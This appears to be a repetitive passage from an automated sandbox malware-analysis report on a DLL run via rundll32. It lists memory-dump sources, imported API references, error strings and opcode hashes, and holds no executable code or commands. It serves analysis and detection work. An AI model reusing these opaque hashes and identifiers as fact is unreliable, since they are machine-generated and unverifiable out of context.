                                                                                                                                                                          • Instruction ID: 6d9ecd41a777639d658862e96072335231d6a508fac0deba82a59c9c78467849
                                                                                                                                                                          • Opcode Fuzzy Hash: 689124f1c0e529a35433716c60f009670efef5b3d9363f5ef2cc53f24d38dee5
                                                                                                                                                                          • Instruction Fuzzy Hash: 06F065C6B5450347F356416F0D90793558B97C0724F73C438A81BD3B50E975C845B110
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.565622867.000000006AD81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.565617607.000000006AD80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADC7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADEA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565711351.000000006ADF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565719265.000000006ADF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADF7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADFA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6ad80000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: ac5fa32d7461fe5cca9e8ed7ed895995d4191905422ce670572497a3d28479bd
                                                                                                                                                                          • Instruction ID: d21f0b0c9f83078936a90973a99dff4a706cf9a84358e083aeb105e761798b8b
                                                                                                                                                                          • Opcode Fuzzy Hash: ac5fa32d7461fe5cca9e8ed7ed895995d4191905422ce670572497a3d28479bd
                                                                                                                                                                          • Instruction Fuzzy Hash: D4F0A9F0A88108EFC768CF5DC890D9977B4AB0A318F4240D4E4A5AB761EB32ED40CB54
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • ldiv_round_up.DISTANTLY.DAT ref: 6ADA036D
                                                                                                                                                                          • ldiv_round_up.DISTANTLY.DAT ref: 6ADA038A
                                                                                                                                                                          • ldiv_round_up.DISTANTLY.DAT ref: 6ADA03B4
                                                                                                                                                                          • ldiv_round_up.DISTANTLY.DAT ref: 6ADA03CA
                                                                                                                                                                          • ldiv_round_up.DISTANTLY.DAT ref: 6ADA0503
                                                                                                                                                                          • ldiv_round_up.DISTANTLY.DAT ref: 6ADA0526
                                                                                                                                                                          • ldiv_round_up.DISTANTLY.DAT ref: 6ADA05E4
                                                                                                                                                                          • ldiv_round_up.DISTANTLY.DAT ref: 6ADA05FC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.565622867.000000006AD81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.565617607.000000006AD80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADC7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADEA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565711351.000000006ADF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565719265.000000006ADF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADF7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADFA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6ad80000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ldiv_round_up.
                                                                                                                                                                          • String ID: T
                                                                                                                                                                          • API String ID: 1469390078-3187964512
                                                                                                                                                                          • Opcode ID: a071a4c00f19c7b7ce4da8639aea14776ed4875d2a2e861e419adeeca33db29a
                                                                                                                                                                          • Instruction ID: e2670bf71c81c8e112190d1212c2ed54c202870f1b43dee4de2f03395455d403
                                                                                                                                                                          • Opcode Fuzzy Hash: a071a4c00f19c7b7ce4da8639aea14776ed4875d2a2e861e419adeeca33db29a
                                                                                                                                                                          • Instruction Fuzzy Hash: 2A2204B0A05B05DFD724CF28C18875EBBE0BB89748F02892DD6C58B741EB75E948CB91
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.565622867.000000006AD81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.565617607.000000006AD80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADC7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADEA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565711351.000000006ADF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565719265.000000006ADF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADF7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADFA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6ad80000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: QueryVirtual$abortfwritememcpyvfprintf
                                                                                                                                                                          • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$@$Address %p has no image-section
                                                                                                                                                                          • API String ID: 3828011698-1098444051
                                                                                                                                                                          • Opcode ID: aaccc6ae1bd24cfccfa11b99ed98473f56a72907cd53e24bfdfe633ba1a4be32
                                                                                                                                                                          • Instruction ID: 863c7aacf0a316b51e3d97c23f2c3647a93b2d5072d4370d178310ae1a9909d3
                                                                                                                                                                          • Opcode Fuzzy Hash: aaccc6ae1bd24cfccfa11b99ed98473f56a72907cd53e24bfdfe633ba1a4be32
                                                                                                                                                                          • Instruction Fuzzy Hash: 1D71C8B49093019FD700DF29D18861ABBF4BB89758F82895DE489C7311EB34E984CB93
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • lpeg_calc_output_dimensions.DISTANTLY.DAT ref: 6ADA0A94
                                                                                                                                                                            • Part of subcall function 6ADA0270: ldiv_round_up.DISTANTLY.DAT ref: 6ADA036D
                                                                                                                                                                            • Part of subcall function 6ADA0270: ldiv_round_up.DISTANTLY.DAT ref: 6ADA038A
                                                                                                                                                                          • linit_1pass_quantizer.DISTANTLY.DAT ref: 6ADA0C52
                                                                                                                                                                          • linit_2pass_quantizer.DISTANTLY.DAT ref: 6ADA0C70
                                                                                                                                                                          • linit_inverse_dct.DISTANTLY.DAT ref: 6ADA0C8B
                                                                                                                                                                          • linit_huff_decoder.DISTANTLY.DAT ref: 6ADA0CAD
                                                                                                                                                                          • linit_d_coef_controller.DISTANTLY.DAT ref: 6ADA0CD3
                                                                                                                                                                          • linit_color_deconverter.DISTANTLY.DAT ref: 6ADA0D88
                                                                                                                                                                          • linit_upsampler.DISTANTLY.DAT ref: 6ADA0D90
                                                                                                                                                                          • linit_d_post_controller.DISTANTLY.DAT ref: 6ADA0DA0
                                                                                                                                                                          • linit_phuff_decoder.DISTANTLY.DAT ref: 6ADA0DAA
                                                                                                                                                                          • linit_merged_upsampler.DISTANTLY.DAT ref: 6ADA0DB5
                                                                                                                                                                          • linit_d_main_controller.DISTANTLY.DAT ref: 6ADA0DCD
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.565622867.000000006AD81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.565617607.000000006AD80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADC7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADEA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565711351.000000006ADF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565719265.000000006ADF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADF7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADFA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6ad80000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ldiv_round_up.$linit_1pass_quantizer.linit_2pass_quantizer.linit_color_deconverter.linit_d_coef_controller.linit_d_main_controller.linit_d_post_controller.linit_huff_decoder.linit_inverse_dct.linit_merged_upsampler.linit_phuff_decoder.linit_upsampler.lpeg_calc_output_dimensions.
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2598987687-0
                                                                                                                                                                          • Opcode ID: 8f8d645404bace55164931a3bfce681cf05279c310a77323abab86c2d1772ee9
                                                                                                                                                                          • Instruction ID: c0387bdecfaaaa072bb99cd075e73faf0a0dabea441fd23d5f9541578158eca5
                                                                                                                                                                          • Opcode Fuzzy Hash: 8f8d645404bace55164931a3bfce681cf05279c310a77323abab86c2d1772ee9
                                                                                                                                                                          • Instruction Fuzzy Hash: ACC1B175908381CEEB158F28C4983967BA1BF01348F4B46A9DE984F397DBB9D484C791
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNEL32(?,?,?,?,00000000,?,6AD813F7), ref: 6AD81078
                                                                                                                                                                          • InterlockedCompareExchange.KERNEL32 ref: 6AD81094
                                                                                                                                                                          • _amsg_exit.MSVCRT ref: 6AD810B2
                                                                                                                                                                          • Sleep.KERNEL32(?,?,?,?,00000000,?,6AD813F7), ref: 6AD810F5
                                                                                                                                                                          • InterlockedCompareExchange.KERNEL32 ref: 6AD8110D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.565622867.000000006AD81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.565617607.000000006AD80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADC7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADEA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565711351.000000006ADF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565719265.000000006ADF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADF7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADFA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6ad80000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CompareExchangeInterlockedSleep$_amsg_exit
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4147465460-0
                                                                                                                                                                          • Opcode ID: bac6e01a1ad78b942d5311be2141cf2e20617ede113cd59077056fcba15d0403
                                                                                                                                                                          • Instruction ID: 3f6f46b6578e8aa65eee795ddd52488bf0bb15b77957d4d50d28a2e0bcf6b46e
                                                                                                                                                                          • Opcode Fuzzy Hash: bac6e01a1ad78b942d5311be2141cf2e20617ede113cd59077056fcba15d0403
                                                                                                                                                                          • Instruction Fuzzy Hash: 265120F1548341CBEB00AF68D58571B7BF4BB41758F838A5DE89487344DB7698888BA3
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • linit_c_master_control.DISTANTLY.DAT ref: 6AD8C253
                                                                                                                                                                          • linit_forward_dct.DISTANTLY.DAT ref: 6AD8C268
                                                                                                                                                                          • linit_huff_encoder.DISTANTLY.DAT ref: 6AD8C282
                                                                                                                                                                          • linit_c_coef_controller.DISTANTLY.DAT ref: 6AD8C2A8
                                                                                                                                                                          • linit_c_main_controller.DISTANTLY.DAT ref: 6AD8C2B8
                                                                                                                                                                          • linit_marker_writer.DISTANTLY.DAT ref: 6AD8C2C0
                                                                                                                                                                          • linit_phuff_encoder.DISTANTLY.DAT ref: 6AD8C2E0
                                                                                                                                                                          • linit_color_converter.DISTANTLY.DAT ref: 6AD8C2F5
                                                                                                                                                                          • linit_downsampler.DISTANTLY.DAT ref: 6AD8C2FD
                                                                                                                                                                          • linit_c_prep_controller.DISTANTLY.DAT ref: 6AD8C30D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.565622867.000000006AD81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.565617607.000000006AD80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADC7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADEA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565711351.000000006ADF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565719265.000000006ADF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADF7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADFA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6ad80000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: linit_c_coef_controller.linit_c_main_controller.linit_c_master_control.linit_c_prep_controller.linit_color_converter.linit_downsampler.linit_forward_dct.linit_huff_encoder.linit_marker_writer.linit_phuff_encoder.
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 746734718-0
                                                                                                                                                                          • Opcode ID: 067cbd41030120c24c9dc2e3ecb1a72afdd8091d4aeeba82ff68ce232f3d6047
                                                                                                                                                                          • Instruction ID: e18b3151966e1939f1b37eac17263b751a1124d1ccf2fe6d581c25418835d927
                                                                                                                                                                          • Opcode Fuzzy Hash: 067cbd41030120c24c9dc2e3ecb1a72afdd8091d4aeeba82ff68ce232f3d6047
                                                                                                                                                                          • Instruction Fuzzy Hash: 6C11A2F040C780DAD750AF7884C875EBAE0BF06708F47596DD8C94B287CB789484DBA2
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • lpeg_add_quant_table.DISTANTLY.DAT ref: 6AD902FB
                                                                                                                                                                          • lpeg_add_quant_table.DISTANTLY.DAT ref: 6AD90323
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.565622867.000000006AD81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.565617607.000000006AD80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADC7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADEA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565711351.000000006ADF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565719265.000000006ADF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADF7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADFA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6ad80000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lpeg_add_quant_table.
                                                                                                                                                                          • String ID: 2
                                                                                                                                                                          • API String ID: 2796859892-450215437
                                                                                                                                                                          • Opcode ID: e94ca69451cebde285347c56735baed99eb44625613ff43082a63bca312c40b4
                                                                                                                                                                          • Instruction ID: e6c5f4e15193e5d4d88a427fddf35b49f97a2a12a02e07099df601144bb54bd3
                                                                                                                                                                          • Opcode Fuzzy Hash: e94ca69451cebde285347c56735baed99eb44625613ff43082a63bca312c40b4
                                                                                                                                                                          • Instruction Fuzzy Hash: 09F15775A08240DFE754DF28D094B967FF2BF86304F4684A8D8888F396DB78D945CB92
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • lpeg_suppress_tables.DISTANTLY.DAT ref: 6AD94B10
                                                                                                                                                                          • linit_c_master_control.DISTANTLY.DAT ref: 6AD94B38
                                                                                                                                                                          • linit_huff_encoder.DISTANTLY.DAT ref: 6AD94B5A
                                                                                                                                                                          • lpeg_write_tables.DISTANTLY.DAT ref: 6AD94BB9
                                                                                                                                                                          • linit_marker_writer.DISTANTLY.DAT ref: 6AD94C15
                                                                                                                                                                          • linit_phuff_encoder.DISTANTLY.DAT ref: 6AD94C46
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.565622867.000000006AD81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.565617607.000000006AD80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADC7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADEA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565711351.000000006ADF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565719265.000000006ADF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADF7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADFA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6ad80000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: linit_c_master_control.linit_huff_encoder.linit_marker_writer.linit_phuff_encoder.lpeg_suppress_tables.lpeg_write_tables.
                                                                                                                                                                          • String ID: D
                                                                                                                                                                          • API String ID: 3931423201-2746444292
                                                                                                                                                                          • Opcode ID: 203de22d7259de9f947a99f002044e9b7749fa9c38b2387a9ba707c46adb9b6b
                                                                                                                                                                          • Instruction ID: f7542c68cc969b726b4af2d78036eb91490fb35bdc98df071e17cc679fca549a
                                                                                                                                                                          • Opcode Fuzzy Hash: 203de22d7259de9f947a99f002044e9b7749fa9c38b2387a9ba707c46adb9b6b
                                                                                                                                                                          • Instruction Fuzzy Hash: 83418EB4505B00DFD754DF24C5C878ABBE0BF48308F02896ED99A8B316DB74E584CBA2
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.565622867.000000006AD81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.565617607.000000006AD80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADC7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADEA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565711351.000000006ADF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565719265.000000006ADF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADF7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADFA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6ad80000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: $
                                                                                                                                                                          • API String ID: 0-3993045852
                                                                                                                                                                          • Opcode ID: 9aea1e327d18141519636dc1b8d95b704eb7b22057aa2022c2894bf34df2473c
                                                                                                                                                                          • Instruction ID: 1eab7fab485df9b0d148d5bed4839e1b7ed347ef04f2027a3b88c764c343b39f
                                                                                                                                                                          • Opcode Fuzzy Hash: 9aea1e327d18141519636dc1b8d95b704eb7b22057aa2022c2894bf34df2473c
                                                                                                                                                                          • Instruction Fuzzy Hash: 8DA1C3B0604301CFDB54DF29C084B5ABBE1BF49304F1684ADD8898F356DB75E989CBA2
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • lpeg_mem_init.DISTANTLY.DAT(?,?,?,?,?,?,?,?,6AD81660), ref: 6ADAF3F3
                                                                                                                                                                          • lpeg_get_small.DISTANTLY.DAT ref: 6ADAF407
                                                                                                                                                                          • getenv.MSVCRT ref: 6ADAF4AB
                                                                                                                                                                          • sscanf.MSVCRT ref: 6ADAF4D4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.565622867.000000006AD81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.565617607.000000006AD80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADC7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADEA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565711351.000000006ADF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565719265.000000006ADF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADF7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADFA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6ad80000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: getenvlpeg_get_small.lpeg_mem_init.sscanf
                                                                                                                                                                          • String ID: T$x
                                                                                                                                                                          • API String ID: 408287029-1002588118
                                                                                                                                                                          • Opcode ID: db5ad559ac98bae7df72a89b57da7feb99cf654f11486630b3f8bb31fe28f1f8
                                                                                                                                                                          • Instruction ID: 5d0387d6458e81ada940056cb392f5bbf3adec300b29f5bae941133d5d4cb07e
                                                                                                                                                                          • Opcode Fuzzy Hash: db5ad559ac98bae7df72a89b57da7feb99cf654f11486630b3f8bb31fe28f1f8
                                                                                                                                                                          • Instruction Fuzzy Hash: D631EDB00087108FEB40DF15C19534ABBE4AF49304F52898DEA988F39AEB79D585CFD2
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.565622867.000000006AD81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.565617607.000000006AD80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADC7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADEA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565711351.000000006ADF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565719265.000000006ADF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADF7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADFA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6ad80000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: getenv
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 498649692-0
                                                                                                                                                                          • Opcode ID: 51101371f779dc29345ce9728112d4cac38d16c5d9db5d12594e895d415b906f
                                                                                                                                                                          • Instruction ID: 3fa1cd730f1959ed6a166857b2401a12dad7c2ce6527365fe1cf0b070ae3f8cc
                                                                                                                                                                          • Opcode Fuzzy Hash: 51101371f779dc29345ce9728112d4cac38d16c5d9db5d12594e895d415b906f
                                                                                                                                                                          • Instruction Fuzzy Hash: 312193F3644105D3EB103F21856E33525A9AB4236AFC708ADC4978B75AEF39C841D367
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Strings
                                                                                                                                                                          • Unknown pseudo relocation protocol version %d., xrefs: 6ADC51EB
                                                                                                                                                                          • Unknown pseudo relocation bit size %d., xrefs: 6ADC503E
                                                                                                                                                                          • VirtualQuery failed for %d bytes at address %p, xrefs: 6ADC4F17, 6ADC4F43, 6ADC51D7
                                                                                                                                                                          Memory Dump Source
